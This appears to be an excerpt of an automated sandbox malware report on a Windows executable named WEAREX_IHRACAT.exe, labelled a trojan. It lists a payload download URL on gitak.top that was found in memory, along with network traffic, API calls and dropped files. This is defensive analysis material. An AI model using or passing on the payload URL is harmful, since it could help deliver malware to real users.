      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249244982.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2828251598.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binR
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.2302693054.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407870559.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binW~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249244982.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779309512.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binX
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.5778014875.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672784128.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binY~
      Source: WEAREX_IHRACAT.exe, 00000002.00000002.6653324742.0000000002838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bince
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.2302693054.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038962760.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2828520597.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407870559.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binc~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4515139164.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305270974.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302693054.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4620491652.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5778014875.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3566476517.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725765947.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2828520597.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723257171.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407870559.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2618082877.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bine~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2617874647.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672578365.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binf
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302487470.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407654898.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2617874647.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binl
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bino~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672578365.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binq
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723003932.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2617874647.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672578365.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779309512.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2828251598.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binz
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/e~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4620491652.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/o~
      Source: WEAREX_IHRACAT.exe, 00000002.00000001.1798696574.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723003932.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302487470.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407654898.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
      Source: unknownHTTPS traffic detected: 172.67.207.219:443 -> 192.168.11.20:49776 version: TLS 1.2
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052D1
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403358
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeFile created: C:\Windows\Fonts\logorrheic.iniJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_00404B0E0_2_00404B0E
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_0040653D0_2_0040653D
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dll 5A1C20A3E2E2EB182976977669F2C5D9F3104477E98F74D69D2434E79B92FDC3
      Source: WEAREX_IHRACAT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal96.troj.evad.winEXE@3/10@1/1
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045C8
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeFile created: C:\Users\user\gangningerneJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeFile created: C:\Users\user\AppData\Local\Temp\nsrB207.tmpJump to behavior
      Source: WEAREX_IHRACAT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeFile read: C:\Users\desktop.iniJump to behavior
